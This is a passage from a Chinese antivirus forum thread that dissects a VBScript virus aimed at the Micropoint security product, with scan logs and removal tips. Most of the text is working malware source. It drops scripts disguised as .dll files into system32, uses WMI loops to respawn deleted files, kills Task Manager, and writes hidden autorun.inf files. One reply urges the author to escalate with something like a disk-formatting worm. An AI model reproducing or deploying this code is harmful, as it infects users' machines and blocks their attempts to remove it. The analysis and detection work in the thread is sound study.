windowscmd.WriteLine("echo (C) 版权所有 1985-2001 Microsoft Corp.")
windowscmd.WriteLine("echo.")
windowscmd.Close
'创建backup.dll文件监视aa目录变动
set dllfile=fsofile.CreateTextFile("c:\windows\system32\backup.dll", True)
dllfile.WriteLine("on error resume next")
dllfile.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
dllfile.WriteLine("Set f = fsofile.CreateFolder("&Chr(34)&"c:\aa"&Chr(34)&")")
dllfile.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\bb.dll"&Chr(34)&","&Chr(34)&"c:\aa\bb.vbs"&Chr(34))
dllfile.WriteLine("set fsofile=nothing")
dllfile.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
dllfile.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & _")
dllfile.WriteLine("strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
dllfile.WriteLine("Set colMonitoredEvents = objWMIService.ExecNotificationQuery _")
dllfile.WriteLine("("&Chr(34)&"SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"Targetinstance ISA 'CIM_DirectoryContainsFile' and "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"TargetInstance.GroupComponent= "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"'Win32_Directory.Name="&Chr(34)&Chr(34)&"c:\\\\aa"&Chr(34)&Chr(34)&"'"&Chr(34)&")")
dllfile.WriteLine("Do")
dllfile.WriteLine("Set objLatestEvent = colMonitoredEvents.NextEvent")
dllfile.WriteLine("WScript.Sleep 10000")
dllfile.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
dllfile.WriteLine("Set f = fsofile.CreateFolder("&Chr(34)&"c:\aa"&Chr(34)&")")
dllfile.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\bb.dll"&Chr(34)&","&Chr(34)&"c:\aa\bb.vbs"&Chr(34))
dllfile.WriteLine("set fsofile=nothing")
dllfile.WriteLine("Loop")
dllfile.Close:
fsofile.CopyFile "c:\windows\system32\backup.dll","c:\windows\backup.vbs"
'创建进进程监视程文件mon1.vbs
set mon1=fsofile.CreateTextFile("c:\windows\system32\mon1.vbs", True)
mon1.WriteLine("on error resume next")
mon1.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon1.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon1.WriteLine(" & "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon1.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon1.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancedeletionevent "&Chr(34)&" _ ")
mon1.WriteLine("& "&Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon1.WriteLine("i = 0")
mon1.WriteLine("Do While i = 0")
mon1.WriteLine("Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon1.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon1.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon1.WriteLine("set shl = nothing")
mon1.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
mon1.WriteLine("set run1=nothing")
mon1.WriteLine("Wscript.Echo("&Chr(34)&"可爱的微点,我将让您头痛的很"&Chr(34)&")")
mon1.WriteLine("Loop")
mon1.close
'创建进进程监视程文件mon2.vbs
set mon2=fsofile.CreateTextFile("c:\windows\system32\mon2.vbs", True)
mon2.WriteLine("on error resume next")
mon2.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon2.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon2.WriteLine(" & "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon2.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon2.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancedeletionevent "&Chr(34)&" _ ")
mon2.WriteLine("& "&Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon2.WriteLine("i = 0:Do While i = 0:Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon2.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon2.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon2.WriteLine("set shl = nothing")
mon2.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
mon2.WriteLine("set run1=nothing")
mon2.WriteLine("Loop")
mon2.close
'创建任务管理器监视程序mon3.vbs
set mon3=fsofile.CreateTextFile("c:\windows\system32\mon3.vbs", True)
mon3.WriteLine("on error resume next")
mon3.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon3.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon3.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon3.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon3.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancecreationevent "&Chr(34)&" _")
mon3.WriteLine("& " &Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon3.WriteLine("i=0:Do While i = 0:Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon3.WriteLine("If objLatestProcess.TargetInstance.Name = "&Chr(34)&"taskmgr.exe"&Chr(34)&" or objLatestProcess.TargetInstance.Name = "&Chr(34)&"TASKMGR.EXE"&Chr(34)&"  Then")
mon3.WriteLine("objLatestProcess.TargetInstance.Terminate")
mon3.WriteLine("End If:Loop")
mon3.close
'创建windows目录监视程序mon4.vbs
set mon4=fsofile.CreateTextFile("c:\windows\system32\mon4.vbs", True)
mon4.WriteLine("on error resume next")
mon4.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon4.WriteLine("on error resume next")
mon4.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon4.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & _")
mon4.WriteLine("strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon4.WriteLine("Set colMonitoredEvents = objWMIService.ExecNotificationQuery _")
mon4.WriteLine("("&Chr(34)&"SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"Targetinstance ISA 'CIM_DirectoryContainsFile' and "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"TargetInstance.GroupComponent= "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"'Win32_Directory.Name="&Chr(34)&Chr(34)&"c:\\\\windows"&Chr(34)&Chr(34)&"'"&Chr(34)&")")
mon4.WriteLine("Do")
mon4.WriteLine("Set objLatestEvent = colMonitoredEvents.NextEvent")
mon4.WriteLine("WScript.Sleep 10000")
mon4.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon4.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon4.WriteLine("set fsofile=nothing")
mon4.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon4.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon4.WriteLine("set run1=nothing:Loop")
mon4.close
set fsofile=nothing
'运行5个监视程序'''''''''''''
'''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''
set run1=createobject("WScript.Shell")  
run1.run"c:\windows\backup.vbs"  
run1.run"c:\windows\system32\mon1.vbs"
'run1.run"c:\windows\system32\mon2.vbs"
'run1.run"c:\windows\system32\mon3.vbs"
run1.run"c:\windows\system32\mon4.vbs"
set run1=nothing
Wscript.Echo("可爱的微点您一直对我无动于衷,这将使您的用户电脑系统死于我的手上,这同样也将成为您的坟墓,希望你为了自己的生存能够尽快解决")
Wscript.Echo("希望您(微点)能尽快解决,俺主人对国产杀毒是很看重的,特别是您(东方微点)跟费尔托斯是俺主人最为看重的两款杀毒软件,请您(微点)别让俺主人失望;俺主人其实并不是存心刁难您的,只是想让您(微点)的主人能够重视俺这类脚本病毒;在逛网页时像俺这样的脚本是很容易中的,相信您(微点)的主人比俺的主人跟清楚;俺的主人一直会期待着您能够拦截俺这类病毒.....")
Wscript.Echo("期待着黎明的阳光,期待微点的上市.........")
回复

举报

白玉箫
 楼主| 发表于 2008-3-14 08:41:25 | 显示全部楼层
这哥们太逗了,写了autoinf,但只写了 c 盘和d盘,俺那机器d盘是光盘映象。O(∩_∩)o...哈哈, 进入到windows目录,会看到6个新建立的文件(有兴趣的可下windows的rar包),其中cmd.bat主要作用是建立autorun,里面的代码如下:
@echo off
echo [AUTORUN] >c:\autorun.inf
echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>c:\autorun.inf
echo ICON=explorer.exe >>c:\autorun.inf
echo [AUTORUN] >d:\autorun.inf
echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>d:\autorun.inf
echo ICON=explorer.exe >>d:\autorun.inf
attrib c:\autorun.inf +h +s +r
attrib d:\autorun.inf +h +s +r
cls
copy c:\widnows\uctools.dll c:\windows\cc.vbs /y
copy c:\windows\system32\backup.dll c:\windows\backup.vbs /y
cls
echo set run1=createobject("WScript.Shell") >c:\windows\aa.vbs
echo run1.run"c:\windows\cc.vbs" >>c:\windows\aa.vbs
echo run1.run"c:\windows\backup.vbs" >>c:\windows\aa.vbs
echo set run1=nothing>>c:\windows\aa.vbs
cscript c:\windows\aa.vbs
cls
echo Microsoft Windows XP [版本 5.1.2600]
echo (C) 版权所有 1985-2001 Microsoft Corp.
echo.

个人认为,如果对电脑的各个盘下同时产生autorun的话,也是件很头疼的事。
其中的backup.vbs的主要作用是保护aa文件夹,代码如下:
on error resume next
Set fsofile = CreateObject("Scripting.FileSystemObject")
Set f = fsofile.CreateFolder("c:\aa")
fsofile.CopyFile "c:\windows\bb.dll","c:\aa\bb.vbs"
set fsofile=nothing
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\cimv2")
Set colMonitoredEvents = objWMIService.ExecNotificationQuery _
("SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE " _
& "Targetinstance ISA 'CIM_DirectoryContainsFile' and " _
& "TargetInstance.GroupComp'Win32_Directory.Name=""c:\\\\aa""'")
Do
Set objLatestEvent = colMonitoredEvents.NextEvent
WScript.Sleep 10000
Set fsofile = CreateObject("Scripting.FileSystemObject")
Set f = fsofile.CreateFolder("c:\aa")
fsofile.CopyFile "c:\windows\bb.dll","c:\aa\bb.vbs"
set fsofile=nothing
Loop

这次在日志里看不到明显的在system32建立的文件了,但是进入到system32后依旧还是看到了熟悉的面孔,有兴趣的可以下system32的rar包。
解决办法:
简单的,找个可杀此毒的软件杀下
装个还原卡或还原类软件,然后清理下autorun.inf
复杂的,手杀,还是逆向思维的思路,反向清除。
写在最后:作者的这个版本比前一个版本思路虽然大致相同,但是已经严谨了很多,比如执行后常规下就看不到任务管理器了,而且进程里也不止原来的3个进程了,另外也加大了对aa文件夹的保护。对正常的清理删除造成了干扰。但是个人觉得那个针对保护aa写的autorun.inf的那个vbs写的不是太好,没有对电脑一共有几个盘进行判定,就加了一个c盘和d盘。
期待作者的下一个作品。
好累啊,先写到这吧。一想到这周要加班就郁闷。。。。。苦啊~~~~睡觉去拉
回复

举报

白玉箫
 楼主| 发表于 2008-3-14 08:42:58 | 显示全部楼层
附上window下产生的windows.rar和system32下产生的system.rar
以供有兴趣者进一步研究

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

hahacomcn
发表于 2008-3-14 09:51:02 | 显示全部楼层
Begin scan in 'C:\Documents and Settings\haha\桌面\system32.rar'
C:\Documents and Settings\haha\桌面\system32.rar
  [0] Archive type: RAR
  --> backup.dll
      [DETECTION] Contains detection pattern of the VBS script virus VBS/CopyFile
      [INFO]      A backup was created as '484cda93.qua'  ( QUARANTINE )
Begin scan in 'C:\Documents and Settings\haha\桌面\WINDOWS.rar'
C:\Documents and Settings\haha\桌面\WINDOWS.rar
  [0] Archive type: RAR
  --> backup.vbs
      [DETECTION] Contains detection pattern of the VBS script virus VBS/CopyFile
  --> vv.dll
      [DETECTION] Contains detection pattern of the VBS script virus VBS/Runner.AH
  --> uctools.dll
      [DETECTION] Contains detection pattern of the VBS script virus VBS/Runner.AH
  --> cc.vbs
      [DETECTION] Contains detection pattern of the VBS script virus VBS/Runner.AH
  --> cmd.bat
      [DETECTION] Contains detection pattern of the batch virus BAT/AutoRun.Q
      [INFO]      A backup was created as '4827da64.qua'  ( QUARANTINE )


End of the scan: 2008年3月14日  09:51
Used time: 00:03 min

The scan has been done completely.

      0 Scanning directories
     15 Files were scanned
      6 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      2 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      9 Files not concerned
      2 Archives were scanned
      0 Warnings
      0 Notes
回复

举报

hahacomcn
发表于 2008-3-14 09:52:36 | 显示全部楼层
Virus or unwanted program 'VBS/Runner.AH [VBS/Runner.AH]'
detected in file 'C:\Documents and Settings\haha\Local Settings\Temp\Rar$DR00.157\1.vbs.
Action performed: Delete file
回复

举报

白玉箫
 楼主| 发表于 2008-3-14 10:05:05 | 显示全部楼层
这个是针对微点出的
回复

举报

Nblock
发表于 2008-3-14 10:19:45 | 显示全部楼层
微点支持者越来越多 个人建议这个作者再刺激下微点 像批处理格盘磁碟机那样要映像深刻
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-14 12:49 , Processed in 0.146923 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表